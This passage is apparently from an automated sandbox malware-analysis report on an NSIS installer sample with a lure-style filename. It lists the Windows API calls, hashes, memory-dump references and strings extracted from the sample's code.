                              • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                              • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                              • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                              APIs
                              • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                              • GetSysColor.USER32(00000000), ref: 00404101
                              • SetTextColor.GDI32(?,00000000), ref: 0040410D
                              • SetBkMode.GDI32(?,?), ref: 00404119
                              • GetSysColor.USER32(?), ref: 0040412C
                              • SetBkColor.GDI32(?,?), ref: 0040413C
                              • DeleteObject.GDI32(?), ref: 00404156
                              • CreateBrushIndirect.GDI32(?), ref: 00404160
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                              • String ID:
                              • API String ID: 2320649405-0
                              • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                              • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                              • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                              • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                              APIs
                                • Part of subcall function 6E131215: GlobalAlloc.KERNEL32(00000040,6E131233,?,6E1312CF,-6E13404B,6E1311AB,-000000A0), ref: 6E13121D
                              • GlobalFree.KERNEL32(?), ref: 6E13259E
                              • GlobalFree.KERNEL32(00000000), ref: 6E1325D8
                              Memory Dump Source
                              • Source File: 00000003.00000002.178277557495.000000006E131000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E130000, based on PE: true
                              • Associated: 00000003.00000002.178277524359.000000006E130000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277587874.000000006E133000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277620276.000000006E135000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6e130000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc
                              • String ID:
                              • API String ID: 1780285237-0
                              • Opcode ID: 2f35e5c187b09e8d11faffe5cce5a1d843e138d5a4e8b290ef4bfc1163c63186
                              • Instruction ID: c0893b415b072d26f7d78eed3df7a4ab2756bcb36e7bb8cab8bc68defa3429f9
                              • Opcode Fuzzy Hash: 2f35e5c187b09e8d11faffe5cce5a1d843e138d5a4e8b290ef4bfc1163c63186
                              • Instruction Fuzzy Hash: 8741D7B1208621EFDB11DFD4CC98CAE7BB9EB863047208A6DF51093100D7719E85EBA1
                              APIs
                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                              • GetMessagePos.USER32 ref: 004049B5
                              • ScreenToClient.USER32(?,?), ref: 004049CF
                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Message$Send$ClientScreen
                              • String ID: f
                              • API String ID: 41195575-1993550816
                              • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                              • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                              APIs
                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                              • MulDiv.KERNEL32(000678F4,00000064,000678F8), ref: 00402CC2
                              • wsprintfA.USER32 ref: 00402CD2
                              • SetWindowTextA.USER32(?,?), ref: 00402CE2
                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                              Strings
                              • verifying installer: %d%%, xrefs: 00402CCC
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Text$ItemTimerWindowwsprintf
                              • String ID: verifying installer: %d%%
                              • API String ID: 1451636040-82062127
                              • Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                              • Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
                              • Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                              • Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58
                              APIs
                              • GlobalFree.KERNEL32(00000000), ref: 6E132407
                                • Part of subcall function 6E131224: lstrcpynA.KERNEL32(00000000,?,6E1312CF,-6E13404B,6E1311AB,-000000A0), ref: 6E131234
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6E132382
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6E132397
                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6E1323A8
                              • CLSIDFromString.OLE32(00000000,00000000), ref: 6E1323B6
                              • GlobalFree.KERNEL32(00000000), ref: 6E1323BD
                              Memory Dump Source
                              • Source File: 00000003.00000002.178277557495.000000006E131000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E130000, based on PE: true
                              • Associated: 00000003.00000002.178277524359.000000006E130000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277587874.000000006E133000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277620276.000000006E135000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6e130000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                              • String ID:
                              • API String ID: 3730416702-0
                              • Opcode ID: 1120ac2f44fe265fbd9f113e8a5d788d0878c34219465c20e24c8d484071bf31
                              • Instruction ID: 2adda87d8f928ec58089ba1ebd230cfa51077e4342c08712bb0c104266c89dc7
                              • Opcode Fuzzy Hash: 1120ac2f44fe265fbd9f113e8a5d788d0878c34219465c20e24c8d484071bf31
                              • Instruction Fuzzy Hash: AC418D71608721DFD720EFA59844BAAB7F8FF46311F31881AE456C7180D73499CAEBA1
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                              • GlobalFree.KERNEL32(?), ref: 004027EB
                              • GlobalFree.KERNEL32(00000000), ref: 004027FE
                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: a019c31d011b64939239049366c04cc5b7ee72d416c1f9e8157d47185f55a0d4
                              • Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
                              • Opcode Fuzzy Hash: a019c31d011b64939239049366c04cc5b7ee72d416c1f9e8157d47185f55a0d4
                              • Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8
                              APIs
                              • lstrlenA.KERNEL32(Meo Setup: Installing,Meo Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                              • wsprintfA.USER32 ref: 0040492E
                              • SetDlgItemTextA.USER32(?,Meo Setup: Installing), ref: 00404941
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s$Meo Setup: Installing
                              • API String ID: 3540041739-73957057
                              • Opcode ID: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                              • Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
                              • Opcode Fuzzy Hash: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                              • Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9
                              APIs
                              • GetDC.USER32(?), ref: 00401D9E
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                              • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                              • CreateFontIndirectA.GDI32(0040B818), ref: 00401E20
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CapsCreateDeviceFontIndirectRelease
                              • String ID:
                              • API String ID: 3808545654-0
                              • Opcode ID: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                              • Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
                              • Opcode Fuzzy Hash: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                              • Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D
                              APIs
                              • GetDlgItem.USER32(?), ref: 00401D45
                              • GetClientRect.USER32(00000000,?), ref: 00401D52
                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                              • DeleteObject.GDI32(00000000), ref: 00401D90
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                              • String ID:
                              • API String ID: 1849352358-0
                              • Opcode ID: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
                              • Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
                              • Opcode Fuzzy Hash: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
                              • Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38
                              APIs
                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                              • Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
                              • Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                              • Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28
                              APIs
                              • FreeLibrary.KERNEL32(?,76193410,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
                              • GlobalFree.KERNEL32(006C0D68), ref: 0040375A
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Free$GlobalLibrary
                              • String ID: C:\Users\user\AppData\Local\Temp\$hl
                              • API String ID: 1100898210-4090050202
                              • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                              • Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
                              • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                              • Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC
                              APIs
                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405947
                              • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CharPrevlstrcatlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2659869361-3355392842
                              • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                              • Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
                              • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                              • Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE
                              APIs
                              • DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
                              • GetTickCount.KERNEL32 ref: 00402D30
                              • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                              • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                              • String ID:
                              • API String ID: 2102729457-0
                              • Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                              • Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
                              • Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                              • Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC
                              APIs
                                • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Meo Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                • Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,76193410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
                                • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                              • lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,76193410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
                              • GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76193410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76193410,C:\Users\user\AppData\Local\Temp\), ref: 00405A89
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
